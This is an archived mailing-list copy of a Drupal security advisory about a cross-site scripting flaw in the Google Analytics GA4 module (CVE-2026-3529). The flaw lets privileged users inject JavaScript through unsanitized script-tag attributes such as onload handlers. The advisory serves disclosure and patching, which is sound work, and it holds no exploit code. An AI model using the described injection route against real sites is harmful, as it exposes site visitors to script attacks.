it-securitynotifies AT lists.piratenpartei.de
Betreff: Sicherheitsankündigungen
Listenarchiv
[IT-SecNots] [Security-news] Google Analytics GA4 - Moderately critical - Cross-site Scripting - SA-CONTRIB-2026-024
Chronologisch Thread
- From: security-news AT drupal.org
- To: security-news AT drupal.org
- Subject: [IT-SecNots] [Security-news] Google Analytics GA4 - Moderately critical - Cross-site Scripting - SA-CONTRIB-2026-024
- Date: Wed, 4 Mar 2026 17:59:52 +0000
- Archived-at: <https://lists.drupal.org/mailman3/hyperkitty/list/security-news AT drupal.org/message/254JUTQLDTXGFYTZGDELWC5XNPASVFSI/>
- Authentication-results: lists.piratenpartei.de; dkim=pass header.d=drupal.org header.s=default header.b=TVB1ettk; dkim=fail ("body hash did not verify") header.d=drupal.org header.s=f34odw3mfzgsrgyn3evjayysxxl6jizn header.b="Ai5/3X4r"; dkim=fail ("body hash did not verify") header.d=amazonses.com header.s=gdwg2y3kokkkj5a55z2ilkup5wp5hhxx header.b="pR/99Jl/"; dmarc=pass (policy=none) header.from=drupal.org; spf=pass (lists.piratenpartei.de: domain of security-news-bounces AT drupal.org designates 2605:bc80:3010::133 as permitted sender) smtp.mailfrom=security-news-bounces AT drupal.org
- Dkim-filter: OpenDKIM Filter v2.11.0 smtp2.osuosl.org 234E041F6B
- Dkim-filter: OpenDKIM Filter v2.11.0 smtp4.osuosl.org 66C2340BA0
- Dmarc-filter: OpenDMARC Filter v1.4.2 smtp4.osuosl.org 66C2340BA0
- Feedback-id: ::1.us-west-2.eaokZ1GT8utLqfMHQoyOsEFVrSIzzS6R+14LP6WIIUY=:AmazonSES
- List-archive: <https://lists.drupal.org/mailman3/hyperkitty/list/security-news AT drupal.org/>
- List-id: <security-news.drupal.org>
View online: https://www.drupal.org/sa-contrib-2026-024
Project: Google Analytics GA4 [1]
Date: 2026-March-04
Security risk: *Moderately critical* 12 ∕ 25
AC:Basic/A:Admin/CI:Some/II:Some/E:Theoretical/TD:Default [2]
Vulnerability: Cross-site Scripting
Affected versions: <1.1.13
CVE IDs: CVE-2026-3529
Description:
The Google Analytics GA4 module enables users to add custom attributes to the
script tag used to load the Google Analytics library. The module does not
sufficiently sanitize these attributes.
This vulnerability is mitigated by the fact that an attacker must have a role
with the "ga4 configure" (or "administer google analytics ga4 settings")
permission.
An attacker with this permission could inject malicious JavaScript via event
handlers (such as onload) or override the script source, leading to a
Cross-Site Scripting (XSS) attack on all pages where the GA4 script is
loaded.
Solution:
Install the latest version:
* If you use the Google Analytics GA4 module, upgrade to Google Analytics
GA4 1.1.13 [3]
Reported By:
* Pierre Rudloff (prudloff) [4] provisional member of the Drupal Security
Team
Fixed By:
* Sujan Shrestha (sujan shrestha) [5]
Coordinated By:
* Greg Knaddison (greggles) [6] of the Drupal Security Team
* Juraj Nemec (poker10) [7] of the Drupal Security Team
------------------------------------------------------------------------------
Contribution record [8]
[1] https://www.drupal.org/project/ga4_google_analytics
[2] https://www.drupal.org/security-team/risk-levels
[3] https://www.drupal.org/project/ga4_google_analytics/releases/1.1.13
[4] https://www.drupal.org/u/prudloff
[5] https://www.drupal.org/u/sujan-shrestha
[6] https://www.drupal.org/u/greggles
[7] https://www.drupal.org/u/poker10
[8] https://new.drupal.org/contribution-record?source_link=https%3A//www.drupal.org/node/3577070
_______________________________________________
Security-news mailing list -- security-news AT drupal.org
To unsubscribe send an email to security-news-leave AT drupal.org
Unsubscribe at
- [IT-SecNots] [Security-news] Google Analytics GA4 - Moderately critical - Cross-site Scripting - SA-CONTRIB-2026-024, security-news, 04.03.2026
Archiv bereitgestellt durch MHonArc 2.6.19+.